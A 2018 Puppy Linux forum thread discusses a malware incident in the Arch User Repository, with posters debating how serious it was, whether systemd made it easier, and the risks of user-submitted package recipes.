Puppy Linux Discussion Forum Forum Index Puppy Linux Discussion Forum
Puppy HOME page : puppylinux.com
"THE" alternative forum : puppylinux.info
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

The time now is Wed 19 Sep 2018, 03:33
All times are UTC - 4
 Forum index » Off-Topic Area » Security
Arch User Repository compromised. Malware added
Post new topic   Reply to topic View previous topic :: View next topic
Page 1 of 1 [7 Posts]  
Author Message
greengeek


Joined: 20 Jul 2010
Posts: 5166
Location: Republic of Novo Zelande

PostPosted: Wed 11 Jul 2018, 14:28    Post subject:  Arch User Repository compromised. Malware added  

The Arch User Repository has been compromised with the addition of some malware, as discussed here:
https://nakedsecurity.sophos.com/2018/07/11/another-linux-distro-poisoned-with-malware/

Seems as if the Arch admins are not overly concerned - basically stating that any repository can become contaminated and it is a case of "buyer beware - if you don't trust it don't install it."

Another timely reminder that adding new software (or allowing updates to previous software or system files) opens the door to increased risk.
Back to top
View user's profile Send private message 
spiritwild


Joined: 03 Oct 2016
Posts: 157

PostPosted: Wed 11 Jul 2018, 19:10    Post subject:  

So..... Per the article, ARCH people think they are tech gods?
Is their response or lack of concern a display of arrogance or what?
Back to top
View user's profile Send private message 
8Geee


Joined: 12 May 2008
Posts: 1668
Location: N.E. USA

PostPosted: Wed 11 Jul 2018, 20:04    Post subject:  

Wow, The admins have been compromised, too Shocked
_________________
Linux user #498913

Some people need to reimagine their thinking.
Back to top
View user's profile Send private message 
anikin

Joined: 10 May 2012
Posts: 1020

PostPosted: Thu 12 Jul 2018, 07:05    Post subject:  

What exactly has been compromised?

AUR (Arch User Repository) is an unsupported repository, where untrusted users publish their recipes/build scripts/PKGBUILD, like for example this one:
https://aur.archlinux.org/packages/palemoon/
https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=palemoon

There are no binaries there - only recipes. Embarrassing - yes. Compromised - hardly.
Back to top
View user's profile Send private message 
scsijon

Joined: 23 May 2007
Posts: 1347
Location: the australian mallee

PostPosted: Thu 12 Jul 2018, 19:23    Post subject:  

Blame is being placed on systemd

quotes:

The aim of the modified lines in acroread was to use curl to download scripts from a remote site, and the script would (if it worked) reconfigure systemd to restart on a regular basis.

looks like systemd makes it easier for compromises - one platform (systemdOS) one payload…


and a "few" others.

Be carefull folks....
Back to top
View user's profile Send private message Visit poster's website 
wiak

Joined: 11 Dec 2007
Posts: 938
Location: not Bulgaria

PostPosted: Thu 12 Jul 2018, 19:28    Post subject:  

scsijon wrote:
looks like systemd makes it easier for compromises - one platform (systemdOS) one payload.


Perhaps, but I don't see how systemd components are easier to compromise than systeminit components - main security issue would seem to be that of the malware app user running it whilst having root user permissions surely?

In the Puppy Linux world, dotpets are put up here and there by anyone who feels fit. Only well-tested and wanted ones end up in official repositories, that's true but murga forum site isn't so much different from AUR, which is also for user recipes (EDIT: except that the murga forum is less secure since it includes binaries and more often quite complex shell-script apps, not just recipes).
wiak
Back to top
View user's profile Send private message 
spiritwild


Joined: 03 Oct 2016
Posts: 157

PostPosted: Thu 12 Jul 2018, 19:50    Post subject:  

I remember, about 20 years ago on a nascar forum, someone thought they would open a file account and give all the users the name and password info in a public message.

I was blown away and I thought it was the worst idea on the entire planet. The internet had not been around that long so maybe people still felt safe in their little shell of fans. Coming from a BBS background it was the same as giving everyone on usenet my sysop password.

I made it known that I thought that was not a good Idea because of obvious reasons but my concerns fell on deaf ears.

When it was hacked and someone changed the password, They all blamed me. Because no one else on the whole damn planet would have though to walk through an open door and steal the goodies. Since I had concerns, I invited the crime to happen. I was amused.

Ah the good ol days.
Back to top
View user's profile Send private message 
Display posts from previous:   Sort by:   
Page 1 of 1 [7 Posts]  
Post new topic   Reply to topic View previous topic :: View next topic
 Forum index » Off-Topic Area » Security
Jump to:  

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group
[ Time: 0.0329s ][ Queries: 12 (0.0025s) ][ GZIP on ]